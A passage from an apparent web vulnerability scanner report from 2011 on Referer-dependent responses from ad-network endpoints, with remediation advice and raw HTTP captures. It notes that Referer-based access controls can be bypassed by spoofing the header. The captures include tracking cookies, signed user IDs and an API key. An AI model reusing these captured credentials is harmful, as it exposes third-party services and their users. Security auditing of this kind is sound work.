var allowedchars = new RegExp("[^A-Za-z0-9]");
while (allowedchars.test(zipcode)) {
zipcode = zipcode.re
...[SNIP]...

15. Referer-dependent response previous next
There are 5 instances of this issue:

http://ad.yieldmanager.com/imp
http://ads.adbrite.com/adserver/vdi/762701
http://api.bizographics.com/v1/profile.json
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/like.php

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defenses are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defenses against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defenses against malicious input should be employed here as for any other kinds of user-supplied data.

15.1. http://ad.yieldmanager.com/imp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.yieldmanager.com
Path:	/imp

Request 1

GET /imp?Z=300x250&click=http%3a%2f%2fad.doubleclick.net%2fclick%3Bh%3Dv8%2f3aa2%2f3%2f0%2f%2a%2fv%3B228957569%3B0%2d0%3B0%3B45421603%3B4307%2d300%2f250%3B38375088%2f38392845%2f1%3B%3B%7Eaopt%3D2%2f0%2f36%2f0%3B%7Esscs%3D%3f&e=58661&S=&I=computers&_salt=791003084&B=10&r=0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/dmd.ehow/computers;cat=computersoftware;scat=;sscat=;art=;qg=;tc=;vid=0;ctype=articles;ugc=0;lvl=1;rsi=;tile=3;sz=300x250;ord=4760230283606905?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!#49P!!!*Z!##wb!+:d(!$9rJ!!H<)!?5%!)I-X?![:Z-!#[Q#!%(/.~~~~~~<ht]%~M.jTN"; BX=90d0t1d6iq2v7&b=3&s=9e; uid=uid=b167d032-2d75-11e0-89fa-003048d6d890&_hmacv=1&_salt=2074615246&_keyid=k1&_hmac=249585fedc0ca1193988128dced0dced5912c7fb; pv1="b!!!!3!#1xy!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@~~!#1y'!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@<l_ss~!#X@7!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@9!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@<!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@>!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#dT5!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT7!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT9!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT<!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#`,W!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,Z!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,]!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,_!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#3yC!!!%G!#4*B!/cr5!%:4s!!!%%!?5%!'k4o6!wVd.!$,gR!$a0[!'>es~~~~~<kI5G<o[wQ~!!x>#!!!/`!$C*N!.E9F!%7Dl!!!!$!?5%!%5XA1!w1K*!%oT=!!MLR!':'O~~~~~<lEIO<t:,n!!.vL"; lifb=%y_Qs7i<Qa>BiQOJap]Thmj[); bh="b!!!#p!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!,D(!!!!#<kI5F!!-?2!!!!'<kI5F!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!%<kI5F!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!#<k2yw!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!2(x!!!!$<kI5F!!4<u!!!!%<kI5F!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!?VS!!ErC<k0fB!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!L_w!!!!'<kdT!!!Mr(!!ErC<k0fB!!OgU!!!!$<kI5F!!Zwb!!!!#<kI5F!!`Yp!!!!#<htUb!!fP+!!!!#<k`g7!!iEC!!!!#<kI5F!!iEb!!!!%<kI5F!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!v:e!!!!$<kI5F!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!###_!!!!#<j?lI!##lo!!!!#<jbO@!#$=X!!!!#<gj@R!#')-!!!!#<k2yx!#*VS!!!!#<jLPe!#+]S!!!!$<kI5F!#-B#!!!!#<l.yn!#-vv!!!!$<iC/K!#.dO!!!!'<kdT!!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#1=E!!!!#<kI4S!#2`q!!!!#<jc#g!#2mR!!!!$<lEIO!#3pS!!!!#<jHAu!#3pv!!!!#<jHAu!#5(X!!!!#<jLPe!#5(Y!!!!#<l.yn!#5(`!!!!#<jLPe!#5(b!!!!#<kI3?!#5(f!!!!#<kI4S!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#7(x!!!!'<kI5F!#8:i!!!!#<jc#c!#8A2!!!!#<k11E!#:dW!!!!#<gj@R!#<T3!!!!#<jbNC!#I=D!!!!#<kjhR!#K?%!!!!#<l8V)!#Kbb!!!!#<jLP/!#LI/!!!!#<k2yw!#LI0!!!!#<k2yw!#MP0!!!!#<jLPe!#MTC!!!!(<lEIR!#MTF!!!!(<lEIR!#MTH!!!!(<lEIR!#MTI!!!!(<lEIR!#MTJ!!!!(<lEIR!#OC2!!!!#<l/M+!#P<=!!!!#<kQRW!#PrV!!!!#<kQRW!#Q+o!!!!'<kdT!!#Qh8!!!!#<l.yn!#Ri/!!!!'<kdT!!#Rij!!!!'<kdT!!#SCj!!!!$<kcU!!#SCk!!!!$<kdT!!#SUp!!!!$<kI5F!#SjO!!!!#<gj@R!#SqW!!!!#<gj@R!#T#d!!!!#<k2yx!#TnE!!!!$<lEIR!#U5p!!!!#<gj@R!#UAO!!!!#<k2yx!#UDQ!!!!(<lEIR!#W^8!!!!#<jem(!#X)y!!!!#<jem(!#X]+!!!!'<kdT!!#ZPo!!!!#<ie2`!#ZhT!!!!'<kI5F!#Zmf!!!!$<kT`F!#]!g!!!!#<gj@R!#]Ky!!!!#<gj@R!#^0$!!!!$<kI5F!#^0%!!!!$<kI5F!#_0t!!!!%<kTb(!#`SX!!!!#<gj@R!#aG>!!!!'<kdT!!#aM'!!!!#<kp_p!#av4!!!!#<iLQl!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<e!!!!#<l.yn!#b<g!!!!#<kI4S!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b=K!!!!#<l.yn!#b?A!!!!#<l.x@!#b](!!!!#<gj@R!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#c8D!!!!#<gj@R!#cC!!!!!#<ie2`!#e@W!!!!#<k_2)!#ePa!!!!#<gj@R!#eR5!!!!#<gj@R!#eVe!!!!#<jHAu!#elE!!!!#<k3!!!#f93!!!!#<gj@R!#fBj!!!!%<kI5F!#fBk!!!!%<kI5F!#fBm!!!!%<kI5F!#fBn!!!!%<kI5F!#fBu!!!!#<gj@R!#fG+!!!!%<kI5F!#fJ/!!!!#<gj@R!#fJw!!!!#<gj@R!#fK9!!!!#<gj@R!#fK>!!!!#<gj@R!#fdu!!!!#<k2yx!#fpW!!!!#<l/JY!#fpX!!!!#<l/JY!#fpY!!!!#<l/JY!#g'E!!!!#<gj@R!#g/7!!!!$<kI5F!#g<%!!!!#<gj@R!#gRx!!!!#<htU3!#g]7!!!!#<l.yn!#g]9!!!!#<kjl4!#h.N!!!!#<kL2n!#jS>!!!!#<k_Jy!#ndJ!!!!#<k2yx!#ndP!!!!#<k2yx!#nda!!!!#<k2yx!#ne$!!!!#<k2yx!#p]T!!!!$<kL2n"; ih="b!!!!<!(4vA!!!!#<kc#t!(mhO!!!!#<lEK*!*09R!!!!#<l/M+!*gS^!!!!#<kI:#!+/Wc!!!!#<jbN?!+:d(!!!!#<htX7!+:d=!!!!$<hu%0!+kS,!!!!#<jbO@!->h]!!!!#<htSD!-g#y!!!!#<k:[]!.E9F!!!!$<lEIO!.N)i!!!!#<htgq!.T97!!!!#<k:^)!.`.U!!!!'<kc#o!.tPr!!!!#<k`nL!/9uI!!!!#<k:]D!/H]-!!!!'<hu!d!/J`3!!!!#<jbND!/c)/!!!!#<h67=!/cr5!!!!#<kI5G!/o:O!!!!#<htU#!/poZ!!!!#<iLQk!/uG1!!!!#<jbOF!0>0V!!!!#<l/M."; vuday1=_UO8O5_x-c!>[UWhS6Z+

Response 1

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:31:00 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: ad0107.rm.ac4
Set-Cookie: lifb=%y_Qs7i<Qa5p0/:; path=/; expires=Wed, 02-Feb-2011 20:10:40 GMT
Cache-Control: no-store
Last-Modified: Wed, 02 Feb 2011 15:31:00 GMT
Pragma: no-cache
Content-Length: 1329
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

document.write('<iframe allowtransparency=\"true\" scrolling=\"no\" marginwidth=\"0\" marginheight=\"0\" frameborder=\"0\" height=\"250\" width=\"300\" src=\"http://ad.thewheelof.com/iframe3?NwQAACcrFgBg5HkAAAAAABp.HwAAAAAAAgEIAAIAAAAAAP8AAAAECgB3HgAAAAAANBMnAAAAAACVeSkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAL90kBoGV8z8v3SQGgZXzPy.dJAaBlfM.L90kBoGV8z8v3SQGgZXzPy.dJAaBlfM.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB1nEfANF2SCZhC.8fSHm0u-hygdL9b6sN.NvKFAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,7031a2b0-2ee1-11e0-b0a7-003048632728\"></iframe>');
var rm_data = new Object();
rm_data.creative_id = 7988320;
rm_data.offer_type = 20;
rm_data.entity_id = 309577;
if (window.rm_crex_data) {rm_crex_data.push(7988320);}

Request 2

GET /imp?Z=300x250&click=http%3a%2f%2fad.doubleclick.net%2fclick%3Bh%3Dv8%2f3aa2%2f3%2f0%2f%2a%2fv%3B228957569%3B0%2d0%3B0%3B45421603%3B4307%2d300%2f250%3B38375088%2f38392845%2f1%3B%3B%7Eaopt%3D2%2f0%2f36%2f0%3B%7Esscs%3D%3f&e=58661&S=&I=computers&_salt=791003084&B=10&r=0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!#49P!!!*Z!##wb!+:d(!$9rJ!!H<)!?5%!)I-X?![:Z-!#[Q#!%(/.~~~~~~<ht]%~M.jTN"; BX=90d0t1d6iq2v7&b=3&s=9e; uid=uid=b167d032-2d75-11e0-89fa-003048d6d890&_hmacv=1&_salt=2074615246&_keyid=k1&_hmac=249585fedc0ca1193988128dced0dced5912c7fb; pv1="b!!!!3!#1xy!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@~~!#1y'!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@<l_ss~!#X@7!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@9!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@<!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@>!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#dT5!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT7!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT9!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT<!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#`,W!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,Z!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,]!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,_!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#3yC!!!%G!#4*B!/cr5!%:4s!!!%%!?5%!'k4o6!wVd.!$,gR!$a0[!'>es~~~~~<kI5G<o[wQ~!!x>#!!!/`!$C*N!.E9F!%7Dl!!!!$!?5%!%5XA1!w1K*!%oT=!!MLR!':'O~~~~~<lEIO<t:,n!!.vL"; lifb=%y_Qs7i<Qa>BiQOJap]Thmj[); bh="b!!!#p!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!,D(!!!!#<kI5F!!-?2!!!!'<kI5F!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!%<kI5F!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!#<k2yw!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!2(x!!!!$<kI5F!!4<u!!!!%<kI5F!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!?VS!!ErC<k0fB!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!L_w!!!!'<kdT!!!Mr(!!ErC<k0fB!!OgU!!!!$<kI5F!!Zwb!!!!#<kI5F!!`Yp!!!!#<htUb!!fP+!!!!#<k`g7!!iEC!!!!#<kI5F!!iEb!!!!%<kI5F!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!v:e!!!!$<kI5F!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!###_!!!!#<j?lI!##lo!!!!#<jbO@!#$=X!!!!#<gj@R!#')-!!!!#<k2yx!#*VS!!!!#<jLPe!#+]S!!!!$<kI5F!#-B#!!!!#<l.yn!#-vv!!!!$<iC/K!#.dO!!!!'<kdT!!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#1=E!!!!#<kI4S!#2`q!!!!#<jc#g!#2mR!!!!$<lEIO!#3pS!!!!#<jHAu!#3pv!!!!#<jHAu!#5(X!!!!#<jLPe!#5(Y!!!!#<l.yn!#5(`!!!!#<jLPe!#5(b!!!!#<kI3?!#5(f!!!!#<kI4S!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#7(x!!!!'<kI5F!#8:i!!!!#<jc#c!#8A2!!!!#<k11E!#:dW!!!!#<gj@R!#<T3!!!!#<jbNC!#I=D!!!!#<kjhR!#K?%!!!!#<l8V)!#Kbb!!!!#<jLP/!#LI/!!!!#<k2yw!#LI0!!!!#<k2yw!#MP0!!!!#<jLPe!#MTC!!!!(<lEIR!#MTF!!!!(<lEIR!#MTH!!!!(<lEIR!#MTI!!!!(<lEIR!#MTJ!!!!(<lEIR!#OC2!!!!#<l/M+!#P<=!!!!#<kQRW!#PrV!!!!#<kQRW!#Q+o!!!!'<kdT!!#Qh8!!!!#<l.yn!#Ri/!!!!'<kdT!!#Rij!!!!'<kdT!!#SCj!!!!$<kcU!!#SCk!!!!$<kdT!!#SUp!!!!$<kI5F!#SjO!!!!#<gj@R!#SqW!!!!#<gj@R!#T#d!!!!#<k2yx!#TnE!!!!$<lEIR!#U5p!!!!#<gj@R!#UAO!!!!#<k2yx!#UDQ!!!!(<lEIR!#W^8!!!!#<jem(!#X)y!!!!#<jem(!#X]+!!!!'<kdT!!#ZPo!!!!#<ie2`!#ZhT!!!!'<kI5F!#Zmf!!!!$<kT`F!#]!g!!!!#<gj@R!#]Ky!!!!#<gj@R!#^0$!!!!$<kI5F!#^0%!!!!$<kI5F!#_0t!!!!%<kTb(!#`SX!!!!#<gj@R!#aG>!!!!'<kdT!!#aM'!!!!#<kp_p!#av4!!!!#<iLQl!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<e!!!!#<l.yn!#b<g!!!!#<kI4S!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b=K!!!!#<l.yn!#b?A!!!!#<l.x@!#b](!!!!#<gj@R!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#c8D!!!!#<gj@R!#cC!!!!!#<ie2`!#e@W!!!!#<k_2)!#ePa!!!!#<gj@R!#eR5!!!!#<gj@R!#eVe!!!!#<jHAu!#elE!!!!#<k3!!!#f93!!!!#<gj@R!#fBj!!!!%<kI5F!#fBk!!!!%<kI5F!#fBm!!!!%<kI5F!#fBn!!!!%<kI5F!#fBu!!!!#<gj@R!#fG+!!!!%<kI5F!#fJ/!!!!#<gj@R!#fJw!!!!#<gj@R!#fK9!!!!#<gj@R!#fK>!!!!#<gj@R!#fdu!!!!#<k2yx!#fpW!!!!#<l/JY!#fpX!!!!#<l/JY!#fpY!!!!#<l/JY!#g'E!!!!#<gj@R!#g/7!!!!$<kI5F!#g<%!!!!#<gj@R!#gRx!!!!#<htU3!#g]7!!!!#<l.yn!#g]9!!!!#<kjl4!#h.N!!!!#<kL2n!#jS>!!!!#<k_Jy!#ndJ!!!!#<k2yx!#ndP!!!!#<k2yx!#nda!!!!#<k2yx!#ne$!!!!#<k2yx!#p]T!!!!$<kL2n"; ih="b!!!!<!(4vA!!!!#<kc#t!(mhO!!!!#<lEK*!*09R!!!!#<l/M+!*gS^!!!!#<kI:#!+/Wc!!!!#<jbN?!+:d(!!!!#<htX7!+:d=!!!!$<hu%0!+kS,!!!!#<jbO@!->h]!!!!#<htSD!-g#y!!!!#<k:[]!.E9F!!!!$<lEIO!.N)i!!!!#<htgq!.T97!!!!#<k:^)!.`.U!!!!'<kc#o!.tPr!!!!#<k`nL!/9uI!!!!#<k:]D!/H]-!!!!'<hu!d!/J`3!!!!#<jbND!/c)/!!!!#<h67=!/cr5!!!!#<kI5G!/o:O!!!!#<htU#!/poZ!!!!#<iLQk!/uG1!!!!#<jbOF!0>0V!!!!#<l/M."; vuday1=_UO8O5_x-c!>[UWhS6Z+

Response 2

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:31:26 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: ad0267.2rm.ac4
Set-Cookie: lifb=%y_Qs7i<Qa5p0/:; path=/; expires=Wed, 02-Feb-2011 20:10:40 GMT
Cache-Control: no-store
Last-Modified: Wed, 02 Feb 2011 15:31:26 GMT
Pragma: no-cache
Content-Length: 1086
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

document.write('<iframe allowtransparency=\"true\" scrolling=\"no\" marginwidth=\"0\" marginheight=\"0\" frameborder=\"0\" height=\"250\" width=\"300\" src=\"http://ad.thewheelof.com/iframe3?AAAAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAAAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAr0fRBI507z8AAPCJecb9P69H0QSOdO8.AADwiXnG.T8siFkYRrvwPwAAIAUErf8.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACuNibBTl2SCYeoMgOZdTkYEYLxFj1aO80f8CsqAAAAAA==,,,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,7f8f7d5e-2ee1-11e0-8855-003048d6d890\"></iframe>');
var rm_data = new Object();
rm_data.creative_id = 8172631;
rm_data.offer_type = 20;
rm_data.entity_id = 379890;
if (window.rm_crex_data) {rm_crex_data.push(8172631);}

15.2. http://ads.adbrite.com/adserver/vdi/762701 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ads.adbrite.com
Path:	/adserver/vdi/762701

Request 1

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Wed, 02 Feb 2011 15:27:51 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: Apache-Coyote/1.1
Set-Cookie: vsd="0@1@4d4977f7@www.ehow.com"; Version=1; Domain=.adbrite.com; Max-Age=172800; Path=/
Set-Cookie: srh=1%3Aq64FAA%3D%3D; Domain=.adbrite.com; Expires=Thu, 03-Feb-2011 15:27:51 GMT; Path=/
Content-Length: 42

GIF89a.............!.......,........@..D.;

Request 2

GET /adserver/vdi/762701?d=D8DB51BF08484217F5D14AB47F4002AD HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=168362173x0.688+1294536261x899753879; cv=1%3Aq1ZyLi0uyc91zUtWslIySyktr0nPLLDMMi8zrjGwMswuNjMusjK0MlCqBQA%3D; ut=1%3Aq1YqM1KyqlbKTq0szy9KKVayUsotTzQprDHMLja3sKwxrTE0z9dJzsiwSC%2BoysmrMczJSS%2BqqjGsMYAJZuUgCSrpKCUl5uWlFmWCjVKqrQUA; rb="0:712156:20822400:6ch47d7o8wtv:0:742697:20828160:3011330574290390485:0:753292:20858400:CA-00000000456885722:0:762701:20861280:D8DB51BF08484217F5D14AB47F4002AD:0:806205:20861280:21d8e954-2b06-11e0-8e8a-0025900870d2:0"

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Wed, 02 Feb 2011 15:28:13 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: Apache-Coyote/1.1
Set-Cookie: srh=1%3Aq64FAA%3D%3D; Domain=.adbrite.com; Expires=Thu, 03-Feb-2011 15:28:14 GMT; Path=/
Content-Length: 42

GIF89a.............!.......,........@..D.;

15.3. http://api.bizographics.com/v1/profile.json previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://api.bizographics.com
Path:	/v1/profile.json

Request 1

GET /v1/profile.json?api_key=6332f8b7316a4d1284e9c1217a367347&callback=Demdex.parseBizo HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://fast.dm.demdex.net/dm-dest.html?bizo=1&bizovalidttl=7&
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KbEYt9Gm0axhaj5XcunNcMDa7Re6IGD4lDrbCisip76D66Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRXq0x1X4kUBB3CBHNXcl3bEVUJBxdqAyDalXCEoKjwKKB7uI3cisSEIeS2mCWkomhIipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Wed, 02 Feb 2011 15:29:04 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
